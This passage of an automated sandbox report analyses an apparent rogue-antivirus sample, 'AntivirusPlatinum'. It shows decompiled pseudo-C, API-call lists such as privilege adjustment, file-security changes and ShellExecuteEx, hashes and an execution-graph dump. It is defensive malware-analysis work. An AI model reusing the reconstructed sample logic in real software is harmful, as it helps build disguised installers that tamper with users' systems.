                                                                                                                                                  						_t15 = SetFileSecurityA(_a8, ??, ??);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t15 = SetFileSecurityW(_a12, ??, ??);
                                                                                                                                                  					}
                                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                                  						E00402C95(E0040B2A9(_t29 + 0x17, E004098F7(0x3e4), _a8));
                                                                                                                                                  						_t15 = E0040325C(0x414c7c, 1);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                  					_t15 = E0040A205(_v16);
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}










                                                                                                                                                  0x0040378b
                                                                                                                                                  0x00403792
                                                                                                                                                  0x0040382b
                                                                                                                                                  0x0040382b
                                                                                                                                                  0x0040379a
                                                                                                                                                  0x004037a6
                                                                                                                                                  0x004037a9
                                                                                                                                                  0x004037ac
                                                                                                                                                  0x004037af
                                                                                                                                                  0x004037b6
                                                                                                                                                  0x004037b8
                                                                                                                                                  0x004037bf
                                                                                                                                                  0x004037c0
                                                                                                                                                  0x004037c6
                                                                                                                                                  0x004037ca
                                                                                                                                                  0x004037ca
                                                                                                                                                  0x004037cb
                                                                                                                                                  0x004037ce
                                                                                                                                                  0x004037d2
                                                                                                                                                  0x004037e2
                                                                                                                                                  0x004037d4
                                                                                                                                                  0x004037d7
                                                                                                                                                  0x004037d7
                                                                                                                                                  0x004037ea
                                                                                                                                                  0x0040380d
                                                                                                                                                  0x00403816
                                                                                                                                                  0x00403816
                                                                                                                                                  0x004037ea
                                                                                                                                                  0x0040381e
                                                                                                                                                  0x00403823
                                                                                                                                                  0x00403823
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                    • Part of subcall function 004034AA: GetCurrentProcess.KERNEL32(00000020,?,00000000,004037BD,?,00000000,?,?), ref: 004034CC
                                                                                                                                                    • Part of subcall function 004034AA: OpenProcessToken.ADVAPI32(00000000), ref: 004034D3
                                                                                                                                                    • Part of subcall function 004034AA: LookupPrivilegeValueA.ADVAPI32 ref: 004034FD
                                                                                                                                                    • Part of subcall function 004034AA: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403514
                                                                                                                                                    • Part of subcall function 004034AA: GetLastError.KERNEL32 ref: 0040351A
                                                                                                                                                    • Part of subcall function 004034AA: LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00403535
                                                                                                                                                    • Part of subcall function 004034AA: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403546
                                                                                                                                                    • Part of subcall function 004034AA: CloseHandle.KERNEL32(?), ref: 0040354B
                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?), ref: 004037D7
                                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000007,?), ref: 004037E2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Token$AdjustFileLookupPrivilegePrivilegesProcessSecurityValue$CloseCurrentErrorHandleLastOpenVersion
                                                                                                                                                  • String ID: |LA
                                                                                                                                                  • API String ID: 4147173873-4290591017
                                                                                                                                                  • Opcode ID: 031a4094fff4cba979b8f8a1f0c503f74b4c030b813af40330e59ae485e2f175
                                                                                                                                                  • Instruction ID: 0910def5baac2a01ac3a580e2fa06c7b6af0b123cc6588ceabb19b3ba280500f
                                                                                                                                                  • Opcode Fuzzy Hash: 031a4094fff4cba979b8f8a1f0c503f74b4c030b813af40330e59ae485e2f175
                                                                                                                                                  • Instruction Fuzzy Hash: 0F118F72900214BBDF017F959C4599D7BACAB48315F00C4BBF905B62C1D77D8F508699
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                  			E00402C96(intOrPtr _a4, long _a8, int* _a12, intOrPtr _a16) {
                                                                                                                                                  				struct HWND__* _t9;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				int _t15;
                                                                                                                                                  				struct HWND__* _t17;
                                                                                                                                                  				int* _t18;
                                                                                                                                                  
                                                                                                                                                  				if( *0x41a792 == 0) {
                                                                                                                                                  					__eflags = _a4 - 2;
                                                                                                                                                  					_t9 =  *0x419f80; // 0x0
                                                                                                                                                  					_t17 = _t9;
                                                                                                                                                  					if(_a4 == 2) {
                                                                                                                                                  						_t15 = IsWindowVisible(_t9);
                                                                                                                                                  						__eflags = _t15;
                                                                                                                                                  						if(_t15 == 0) {
                                                                                                                                                  							_t17 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *0x419ee8; // 0x0
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						L9:
                                                                                                                                                  						_t18 = _a12;
                                                                                                                                                  						E0040A477(_t18, 0x419ee8);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t14 = DialogBoxParamA( *0x414c74, "GETPASSWORD1", _t17, E0040B213, _a8);
                                                                                                                                                  						__eflags = _t14;
                                                                                                                                                  						if(_t14 != 0) {
                                                                                                                                                  							goto L9;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t18 = _a12;
                                                                                                                                                  							 *_t18 = 0;
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *_t18;
                                                                                                                                                  					if( *_t18 != 0) {
                                                                                                                                                  						_push(0x80);
                                                                                                                                                  						_push(_t18);
                                                                                                                                                  						_push(0x41a792);
                                                                                                                                                  						goto L12;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_a16);
                                                                                                                                                  					_t18 = _a12;
                                                                                                                                                  					_push(0x41a792);
                                                                                                                                                  					_push(_t18);
                                                                                                                                                  					L12:
                                                                                                                                                  					E0040A4AB();
                                                                                                                                                  				}
                                                                                                                                                  				return 0 |  *_t18 != 0x00000000;
                                                                                                                                                  			}








                                                                                                                                                  0x0040bc67
                                                                                                                                                  0x0040bc77
                                                                                                                                                  0x0040bc7b
                                                                                                                                                  0x0040bc80
                                                                                                                                                  0x0040bc82
                                                                                                                                                  0x0040bc85
                                                                                                                                                  0x0040bc8b
                                                                                                                                                  0x0040bc8d
                                                                                                                                                  0x0040bc8f
                                                                                                                                                  0x0040bc8f
                                                                                                                                                  0x0040bc8f
                                                                                                                                                  0x0040bc8d
                                                                                                                                                  0x0040bc91
                                                                                                                                                  0x0040bc97
                                                                                                                                                  0x0040bcc8
                                                                                                                                                  0x0040bcc8
                                                                                                                                                  0x0040bcd1
                                                                                                                                                  0x0040bc99
                                                                                                                                                  0x0040bcad
                                                                                                                                                  0x0040bcb3
                                                                                                                                                  0x0040bcb5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bcb7
                                                                                                                                                  0x0040bcb7
                                                                                                                                                  0x0040bcba
                                                                                                                                                  0x0040bcbc
                                                                                                                                                  0x0040bcbc
                                                                                                                                                  0x0040bcb5
                                                                                                                                                  0x0040bcd6
                                                                                                                                                  0x0040bcd8
                                                                                                                                                  0x0040bcda
                                                                                                                                                  0x0040bcdf
                                                                                                                                                  0x0040bce0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bce0
                                                                                                                                                  0x0040bc69
                                                                                                                                                  0x0040bc69
                                                                                                                                                  0x0040bc6c
                                                                                                                                                  0x0040bc6f
                                                                                                                                                  0x0040bc74
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bce5
                                                                                                                                                  0x0040bcf4

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DialogParamVisibleWindow
                                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                                  • API String ID: 3157717868-3292211884
                                                                                                                                                  • Opcode ID: 0856605c94a204dc3c5ee9fad0e89998df4169891d6accadbc66455f57c12071
                                                                                                                                                  • Instruction ID: e13c2818cff99f58c8b25236b3b71f5baad7010d8761cbc8bff7993bfc24fc4f
                                                                                                                                                  • Opcode Fuzzy Hash: 0856605c94a204dc3c5ee9fad0e89998df4169891d6accadbc66455f57c12071
                                                                                                                                                  • Instruction Fuzzy Hash: 1D018232189355BBEB21DF609D4AAD77A54EA21314B14843FF880732C0D7B89CA097DE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:14.8%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:3.3%
                                                                                                                                                  Total number of Nodes:1210
                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                  execution_graph 2604 401000 memset GetModuleHandleA HeapCreate 2605 401044 2604->2605 2876 407470 HeapCreate RtlAllocateHeap 2605->2876 2607 401049 2877 406807 HeapCreate 2607->2877 2609 40104e 2878 406040 2609->2878 2617 401062 2896 40393b 2617->2896 2619 401067 2899 403694 6F7EDB20 CoInitialize 2619->2899 2621 40106c 2900 403ef0 RtlAllocateHeap 2621->2900 2629 4010bf GetUserDefaultLangID VerLanguageNameA CharLowerA 2913 403de0 2629->2913 2631 4010fc 2917 4030f0 2631->2917 2635 401113 2636 40112a 2635->2636 2637 4011ff 2635->2637 3047 403108 2636->3047 2638 403108 4 API calls 2637->2638 2640 40120f 2638->2640 2643 403108 4 API calls 2640->2643 2642 403108 4 API calls 2644 40114a 2642->2644 2645 40121f 2643->2645 2646 403108 4 API calls 2644->2646 2647 403108 4 API calls 2645->2647 2648 40115a 2646->2648 2649 40122f 2647->2649 2650 403108 4 API calls 2648->2650 2651 403108 4 API calls 2649->2651 2653 40116a 2650->2653 2652 40123f 2651->2652 2654 403108 4 API calls 2652->2654 2655 403108 4 API calls 2653->2655 2656 40124f 2654->2656 2657 40117a 2655->2657 2658 403108 4 API calls 2656->2658 2659 403108 4 API calls 2657->2659 2660 40125f 2658->2660 2661 40118a 2659->2661 2662 403108 4 API calls 2660->2662 2663 403108 4 API calls 2661->2663 2664 40126f 2662->2664 2665 40119a 2663->2665 2666 403108 4 API calls 2664->2666 2667 403108 4 API calls 2665->2667 2668 40127f 2666->2668 2669 4011aa 2667->2669 2670 403108 4 API calls 2668->2670 2671 403108 4 API calls 2669->2671 2672 40128f 2670->2672 2673 4011ba 2671->2673 2675 403108 4 API calls 2672->2675 2674 403108 4 API calls 2673->2674 2676 4011ca 2674->2676 2677 40129f 2675->2677 2678 403108 4 API calls 2676->2678 2679 403108 4 API calls 2677->2679 2680 4011da 2678->2680 2681 4012af 2679->2681 2682 403108 4 API calls 2680->2682 2683 403108 4 API calls 2681->2683 2685 4011ea 2682->2685 2684 4012bf 2683->2684 2686 403108 4 API calls 2684->2686 2687 403108 4 API calls 2685->2687 2688 4011fa 2686->2688 2687->2688 2921 403cd7 GetVersionExA 2688->2921 2691 4012f6 2926 403b70 2691->2926 2692 4012db 3050 4036a2 2692->3050 2695 401302 2932 403a66 2695->2932 2697 401ba4 ExitProcess HeapDestroy ExitProcess 2699 40138a 2936 4020b1 2699->2936 2702 4074f0 strlen RtlReAllocateHeap 2712 401325 2702->2712 2703 4013b5 2705 4036a2 16 API calls 2703->2705 2704 40139e 2943 401bdd 2704->2943 2707 4012f1 2705->2707 2707->2697 2709 4020b1 6 API calls 2711 4013e5 2709->2711 2713 4013e9 2711->2713 2714 40140f 2711->2714 2712->2699 2712->2702 2718 4030f0 2 API calls 2712->2718 3057 403a18 2712->3057 2715 403de0 RtlReAllocateHeap 2713->2715 2716 4036a2 16 API calls 2714->2716 2717 401401 2715->2717 2716->2707 2719 4030f0 2 API calls 2717->2719 2718->2712 2720 40140d 2719->2720 2721 4020b1 6 API calls 2720->2721 2722 40143f 2721->2722 2723 401463 2722->2723 2724 401443 2722->2724 2725 4036a2 16 API calls 2723->2725 2726 4020b1 6 API calls 2724->2726 2725->2707 2727 401493 2726->2727 2728 4020b1 6 API calls 2727->2728 2729 4014c5 2728->2729 2730 4020b1 6 API calls 2729->2730 2731 4014f7 2730->2731 2732 401756 2731->2732 3063 404de6 2731->3063 2734 403de0 RtlReAllocateHeap 2732->2734 2736 40176e 2734->2736 2738 4030f0 2 API calls 2736->2738 2740 40177a 2738->2740 2741 403de0 RtlReAllocateHeap 2740->2741 2743 401792 2741->2743 2745 4030f0 2 API calls 2743->2745 2747 40179e 2745->2747 2749 4020b1 6 API calls 2747->2749 2751 4017ae 2749->2751 2753 401a25 2751->2753 2755 403a18 3 API calls 2751->2755 2978 4074f0 2753->2978 2758 4017c7 2755->2758 2757 4015b5 2765 4015c5 _rmdir 2757->2765 2770 4015fc 2757->2770 2771 401645 2757->2771 3094 40505e 2757->3094 2761 403de0 RtlReAllocateHeap 2758->2761 2759 401a36 2762 4074f0 2 API calls 2759->2762 2763 4017e5 2761->2763 2764 401a40 2762->2764 2763->2753 2772 40181c 2763->2772 2766 4074f0 2 API calls 2764->2766 2765->2697 2767 401a4b 2766->2767 2768 4030f0 2 API calls 2767->2768 2769 401a57 2768->2769 2982 406170 2769->2982 3097 4045fc 2770->3097 2775 4045fc 4 API calls 2771->2775 3161 405dd5 2772->3161 2779 401656 2775->2779 2777 401a67 2781 401a87 2777->2781 2782 401a6b 2777->2782 2778 40160d 2783 4030f0 2 API calls 2778->2783 2784 4030f0 2 API calls 2779->2784 2780 40182f 3165 4036f8 2780->3165 2788 405ea0 DeleteFileA 2781->2788 2992 406250 2782->2992 2787 401619 2783->2787 2789 401662 2784->2789 3103 404925 2787->3103 2793 401a92 2788->2793 2794 404925 14 API calls 2789->2794 2790 40184a 2795 4030f0 2 API calls 2790->2795 2791 401a7b 2999 405fd0 2791->2999 2798 402025 6 API calls 2793->2798 2797 401623 2794->2797 2805 401856 2795->2805 2799 401678 2797->2799 2800 401a97 2798->2800 3120 406860 2799->3120 2801 4036a2 16 API calls 2800->2801 2802 401aad _rmdir 2801->2802 2802->2697 2803 401a85 2807 401adf 2803->2807 2811 402118 55 API calls 2803->2811 2804 4019c6 2808 403a79 4 API calls 2804->2808 2805->2804 2809 4074f0 2 API calls 2805->2809 2813 4074f0 2 API calls 2807->2813 2812 4019df 2808->2812 2814 40187a 2809->2814 2811->2807 2816 405e15 2 API calls 2812->2816 2817 401af6 2813->2817 2818 4030f0 2 API calls 2814->2818 2815 403de0 RtlReAllocateHeap 2819 4016b4 2815->2819 2820 4019f3 2816->2820 2821 4074f0 2 API calls 2817->2821 2829 401886 2818->2829 2824 4016fd 2819->2824 2825 4016cf 2819->2825 2822 405e90 SetCurrentDirectoryA 2820->2822 2823 401b01 2821->2823 2826 401a07 _rmdir 2822->2826 3007 402761 2823->3007 2831 4020b1 6 API calls 2824->2831 2830 4036a2 16 API calls 2825->2830 2826->2697 2828 4018a0 3234 406230 2828->3234 2829->2828 3187 402118 2829->3187 2835 4016e5 _rmdir 2830->2835 2836 40170d 2831->2836 2835->2697 3126 401d3f 2836->3126 2840 401998 2845 406170 7 API calls 2840->2845 2844 405fd0 5 API calls 2847 4018c2 2844->2847 2848 4019a8 2845->2848 2850 4074f0 2 API calls 2847->2850 2848->2804 2851 406250 6 API calls 2848->2851 2849 401b51 3038 405e15 2849->3038 2853 4018de 2850->2853 2854 4019bc 2851->2854 2856 4074f0 2 API calls 2853->2856 2857 405fd0 5 API calls 2854->2857 2859 4018e8 2856->2859 2857->2804 2861 4074f0 2 API calls 2859->2861 2862 4018f3 2861->2862 2863 4074f0 2 API calls 2862->2863 2864 4018fd 2863->2864 2865 4074f0 2 API calls 2864->2865 2866 401908 2865->2866 2867 4036a2 16 API calls 2866->2867 2868 401923 2867->2868 2868->2840 2869 401939 2868->2869 2870 403a79 4 API calls 2869->2870 2871 401952 2870->2871 2872 405e15 2 API calls 2871->2872 2873 401966 2872->2873 2874 405e90 SetCurrentDirectoryA 2873->2874 2875 40197a _rmdir 2874->2875 2875->2697 2876->2607 2877->2609 3237 4066f1 RtlAllocateHeap RtlAllocateHeap 2878->3237 2880 401053 2881 404ab3 2880->2881 3238 4066f1 RtlAllocateHeap RtlAllocateHeap 2881->3238 2883 404ac1 3239 406434 RtlAllocateHeap 2883->3239 2886 405082 2887 406434 RtlAllocateHeap 2886->2887 2888 401058 2887->2888 2889 4040e0 RtlInitializeCriticalSection GetStockObject 2888->2889 3241 4066f1 RtlAllocateHeap RtlAllocateHeap 2889->3241 2891 40410b 2892 406434 RtlAllocateHeap 2891->2892 2893 404121 memset 2892->2893 2894 40105d 2893->2894 2895 403d90 HeapCreate 2894->2895 2895->2617 2897 406434 RtlAllocateHeap 2896->2897 2898 403946 RtlInitializeCriticalSection 2897->2898 2898->2619 2899->2621 3242 40645c RtlAllocateHeap 2900->3242 2903 403060 2904 403065 2903->2904 2905 4010a6 2903->2905 2907 403087 HeapFree 2904->2907 3244 403128 2904->3244 2908 4030a0 RtlAllocateHeap 2905->2908 2907->2905 2909 4010b5 2908->2909 2910 403dc0 2909->2910 2911 403dc8 RtlAllocateHeap 2910->2911 2912 403dda 2910->2912 2911->2629 2912->2629 2914 403dea 2913->2914 3248 407750 2914->3248 2916 403df7 2916->2631 3251 407580 2917->3251 2919 401108 2920 403e30 HeapFree 2919->2920 2920->2635 2922 403cfe 2921->2922 2923 4012d4 2921->2923 2922->2923 2924 403d18 GetVersionExA 2922->2924 2923->2691 2923->2692 2924->2923 2925 403d32 2924->2925 2925->2923 2927 403b90 2926->2927 2928 403b98 2927->2928 2929 403bba SetUnhandledExceptionFilter 2927->2929 2930 403ba1 SetUnhandledExceptionFilter 2928->2930 2931 403bab SetUnhandledExceptionFilter 2928->2931 2929->2695 2930->2931 2931->2695 2933 403a71 2932->2933 3255 403957 2933->3255 3260 403100 2936->3260 2939 402102 3263 407550 2939->3263 2940 4020de LoadResource SizeofResource 2940->2939 2944 403dc0 RtlAllocateHeap 2943->2944 2945 401bed 2944->2945 3269 405eb2 2945->3269 2947 401bfc 2948 4030f0 2 API calls 2947->2948 2949 401c06 GetTempFileNameA 2948->2949 3276 403e50 2949->3276 2952 4030f0 2 API calls 2953 401c38 2952->2953 3282 403e30 HeapFree 2953->3282 2955 401c40 2956 405ea0 DeleteFileA 2955->2956 2957 401c4b 2956->2957 3283 405f13 2957->3283 2960 405dd5 2 API calls 2961 401c62 2960->2961 2962 4030f0 2 API calls 2961->2962 2963 401c6e 2962->2963 2964 401cc3 2963->2964 2965 4074f0 2 API calls 2963->2965 2970 401ce0 2963->2970 2966 4074f0 2 API calls 2964->2966 2967 401ca2 2965->2967 2968 401cd4 2966->2968 2969 4074f0 2 API calls 2967->2969 2971 4030f0 2 API calls 2968->2971 2972 401cad 2969->2972 2973 407550 HeapFree 2970->2973 2971->2970 2974 4074f0 2 API calls 2972->2974 2975 4013b3 2973->2975 2976 401cb7 2974->2976 2975->2709 2977 4030f0 2 API calls 2976->2977 2977->2964 2979 40751e 2978->2979 2980 4074ff strlen 2978->2980 2979->2759 2981 407750 RtlReAllocateHeap 2980->2981 2981->2979 3288 40662c 2982->3288 2985 4061c6 2987 406211 2985->2987 2988 4061ca RtlAllocateHeap 2985->2988 2986 4061ad CreateFileA 2986->2985 2986->2987 2990 406224 2987->2990 3294 4066bb 2987->3294 2989 4061ff 2988->2989 2989->2777 2990->2777 2993 406260 2992->2993 2994 406298 2992->2994 2993->2994 2995 4062a0 2993->2995 2997 406285 2993->2997 2994->2791 2995->2995 2996 4062a9 WriteFile 2995->2996 2996->2791 3305 406330 2997->3305 3000 406022 2999->3000 3001 405fda 2999->3001 3000->2803 3001->3000 3002 405ff3 3001->3002 3003 40600c CloseHandle 3001->3003 3004 405f90 WriteFile 3002->3004 3005 4066bb 2 API calls 3003->3005 3006 405ff9 HeapFree 3004->3006 3005->3000 3006->3003 3008 402768 3007->3008 3008->3008 3009 403100 2 API calls 3008->3009 3010 402781 3009->3010 3011 403100 2 API calls 3010->3011 3012 40278e 3011->3012 3013 403100 2 API calls 3012->3013 3014 40279b ShellExecuteEx 3013->3014 3015 4027e2 Sleep GetExitCodeProcess 3014->3015 3016 402801 3015->3016 3016->3015 3017 40280d 3016->3017 3018 407550 HeapFree 3017->3018 3019 402822 3018->3019 3020 407550 HeapFree 3019->3020 3021 40282b 3020->3021 3022 407550 HeapFree 3021->3022 3023 401b22 3022->3023 3024 402025 3023->3024 3025 401b2d 3024->3025 3026 402032 3024->3026 3030 405ea0 3025->3030 3026->3025 3028 40205d 3026->3028 3028->3026 3029 405ea0 DeleteFileA 3028->3029 3319 406960 3028->3319 3029->3028 3031 405ea7 DeleteFileA 3030->3031 3032 401b38 3030->3032 3031->3032 3033 403a79 3032->3033 3034 407750 RtlReAllocateHeap 3033->3034 3035 403a8b GetModuleFileNameA strcmp 3034->3035 3036 403aae memmove 3035->3036 3037 403ac2 3035->3037 3036->3037 3037->2849 3039 405e25 3038->3039 3040 407750 RtlReAllocateHeap 3039->3040 3041 405e62 3040->3041 3042 401b65 3041->3042 3043 405e76 strncpy 3041->3043 3044 405e90 3042->3044 3043->3042 3045 405e97 SetCurrentDirectoryA 3044->3045 3046 401b79 _rmdir 3044->3046 3045->3046 3046->2697 3327 407650 3047->3327 3049 40113a 3049->2642 3334 4038b5 3050->3334 3055 4038b5 12 API calls 3056 4036cb 3055->3056 3056->2707 3058 403a2b 3057->3058 3059 403957 GetCommandLineA 3058->3059 3060 403a40 3059->3060 3061 407750 RtlReAllocateHeap 3060->3061 3062 403a4e strncpy 3061->3062 3062->2712 3352 404b03 3063->3352 3065 401528 3066 4042bd 3065->3066 3376 4041cf 3066->3376 3069 4043ae 3070 4043bf 3069->3070 3071 404422 CreateWindowExA 3070->3071 3072 4043cf memset 3070->3072 3074 404472 3071->3074 3078 401574 3071->3078 3072->3071 3075 40662c 2 API calls 3074->3075 3076 404480 SetWindowLongA 3075->3076 3077 4047bb 4 API calls 3076->3077 3077->3078 3079 4045b3 3078->3079 3390 4044f0 3079->3390 3082 404e09 3084 404e23 3082->3084 3083 4015ab 3090 4045d3 3083->3090 3084->3083 3085 404eb2 RtlReAllocateHeap 3084->3085 3086 404e8f RtlAllocateHeap 3084->3086 3087 404ea1 3084->3087 3085->3087 3086->3087 3088 404f06 DestroyAcceleratorTable 3087->3088 3089 404f0d CreateAcceleratorTableA 3087->3089 3088->3089 3089->3083 3092 4045da 3090->3092 3091 4045f3 SetFocus 3093 4045f9 3091->3093 3092->3091 3092->3093 3093->2757 3400 404f24 3094->3400 3098 40460c 3097->3098 3099 404625 GetWindowTextLengthA 3098->3099 3102 40461c 3098->3102 3100 407750 RtlReAllocateHeap 3099->3100 3101 40463b GetWindowTextA strlen 3100->3101 3101->3102 3102->2778 3104 40493d 3103->3104 3105 404947 GetWindow 3104->3105 3106 404a0e 3104->3106 3107 404962 RemovePropA RemovePropA 3105->3107 3108 404955 3105->3108 3106->2797 3110 404980 RevokeDragDrop 3107->3110 3111 404988 3107->3111 3108->3107 3109 40495b SetActiveWindow 3108->3109 3109->3107 3110->3111 3112 4049a1 DestroyWindow sprintf UnregisterClassA 3111->3112 3113 40498f SendMessageA 3111->3113 3114 4049d3 3112->3114 3113->3114 3115 4049f2 3114->3115 3116 4049da HeapFree DestroyAcceleratorTable 3114->3116 3117 404a00 3115->3117 3118 4049f9 DeleteObject 3115->3118 3116->3115 3119 4066bb 2 API calls 3117->3119 3118->3117 3119->3106 3121 40686d 3120->3121 3426 4073b0 3121->3426 3123 406890 3124 407750 RtlReAllocateHeap 3123->3124 3125 401696 3124->3125 3125->2815 3127 401d47 3126->3127 3127->3127 3128 403100 2 API calls 3127->3128 3129 401d60 3128->3129 3429 403110 3129->3429 3132 4030a0 RtlAllocateHeap 3133 401d87 3132->3133 3134 403110 HeapFree 3133->3134 3135 401d9f 3134->3135 3136 4030a0 RtlAllocateHeap 3135->3136 3137 401dae 3136->3137 3138 403110 HeapFree 3137->3138 3139 401dc6 3138->3139 3140 4030a0 RtlAllocateHeap 3139->3140 3141 401dd5 3140->3141 3432 4024a8 3141->3432 3144 4024a8 5 API calls 3145 401df9 3144->3145 3146 4024a8 5 API calls 3145->3146 3148 401e0d 3146->3148 3147 401f91 3149 407550 HeapFree 3147->3149 3148->3147 3154 403dc0 RtlAllocateHeap 3148->3154 3158 401f5a _rmdir 3148->3158 3450 403ec0 3148->3450 3150 401fff 3149->3150 3151 403110 HeapFree 3150->3151 3152 402009 3151->3152 3153 403110 HeapFree 3152->3153 3155 402012 3153->3155 3154->3148 3156 403110 HeapFree 3155->3156 3157 40201b 3156->3157 3157->2732 3159 4036a2 16 API calls 3158->3159 3159->3148 3162 407750 RtlReAllocateHeap 3161->3162 3163 405de7 GetCurrentDirectoryA 3162->3163 3164 405df7 3163->3164 3164->2780 3166 40370d CoInitialize 3165->3166 3167 40371e memset LoadLibraryA 3165->3167 3166->3167 3168 403834 3167->3168 3169 403748 strncpy strlen 3167->3169 3171 407750 RtlReAllocateHeap 3168->3171 3172 40378d GetProcAddress 3169->3172 3173 40377f 3169->3173 3176 40383d 3171->3176 3174 40390d 3 API calls 3172->3174 3173->3172 3175 4037ac 3174->3175 3177 4038b5 12 API calls 3175->3177 3176->2790 3178 4037cd 3177->3178 3179 4038b5 12 API calls 3178->3179 3180 4037de 3179->3180 3181 4037e3 GetProcAddress 3180->3181 3182 403826 FreeLibrary 3180->3182 3183 407750 RtlReAllocateHeap 3181->3183 3182->3168 3182->3176 3184 4037f8 strlen 3183->3184 3184->3182 3186 40381e 3184->3186 3186->3182 3188 40211f 3187->3188 3188->3188 3189 403100 2 API calls 3188->3189 3190 402138 3189->3190 3191 405e90 SetCurrentDirectoryA 3190->3191 3195 40214b 3191->3195 3193 4030f0 RtlAllocateHeap RtlReAllocateHeap 3193->3195 3194 4074f0 2 API calls 3194->3195 3195->3193 3195->3194 3224 4021d2 3195->3224 3457 403220 3195->3457 3196 4023a3 3476 4035d0 3196->3476 3200 406230 9 API calls 3200->3224 3201 4023d9 3203 4074f0 2 API calls 3201->3203 3232 402470 3201->3232 3202 406170 7 API calls 3202->3224 3205 402415 3203->3205 3204 407550 HeapFree 3206 402485 3204->3206 3207 4074f0 2 API calls 3205->3207 3209 407550 HeapFree 3206->3209 3210 40241f 3207->3210 3211 40248e 3209->3211 3212 4074f0 2 API calls 3210->3212 3214 407550 HeapFree 3211->3214 3215 402428 3212->3215 3213 405fd0 WriteFile HeapFree CloseHandle memset HeapFree 3213->3224 3216 402497 3214->3216 3217 4074f0 2 API calls 3215->3217 3219 407550 HeapFree 3216->3219 3220 402432 3217->3220 3222 4024a0 3219->3222 3223 4074f0 2 API calls 3220->3223 3221 4074f0 strlen RtlReAllocateHeap 3221->3224 3222->2828 3225 40243d 3223->3225 3224->3196 3224->3200 3224->3202 3224->3213 3224->3221 3227 4030f0 RtlAllocateHeap RtlReAllocateHeap 3224->3227 3229 4036a2 16 API calls 3224->3229 3231 406960 5 API calls 3224->3231 3224->3232 3233 402025 6 API calls 3224->3233 3465 4062d0 3224->3465 3472 403fa3 3224->3472 3226 4036a2 16 API calls 3225->3226 3228 402458 3226->3228 3227->3224 3230 402025 6 API calls 3228->3230 3228->3232 3229->3224 3230->3232 3231->3224 3232->3204 3233->3224 3496 406060 3234->3496 3236 4018b0 3236->2840 3236->2844 3237->2880 3238->2883 3240 404ad4 LoadIconA LoadCursorA 3239->3240 3240->2886 3241->2891 3243 401087 3242->3243 3243->2903 3245 403188 3244->3245 3246 403139 3244->3246 3245->2904 3246->3245 3247 40316e HeapFree 3246->3247 3247->3246 3249 4077a2 3248->3249 3250 40776f RtlReAllocateHeap 3248->3250 3249->2916 3250->3249 3252 4075b3 RtlReAllocateHeap 3251->3252 3253 407597 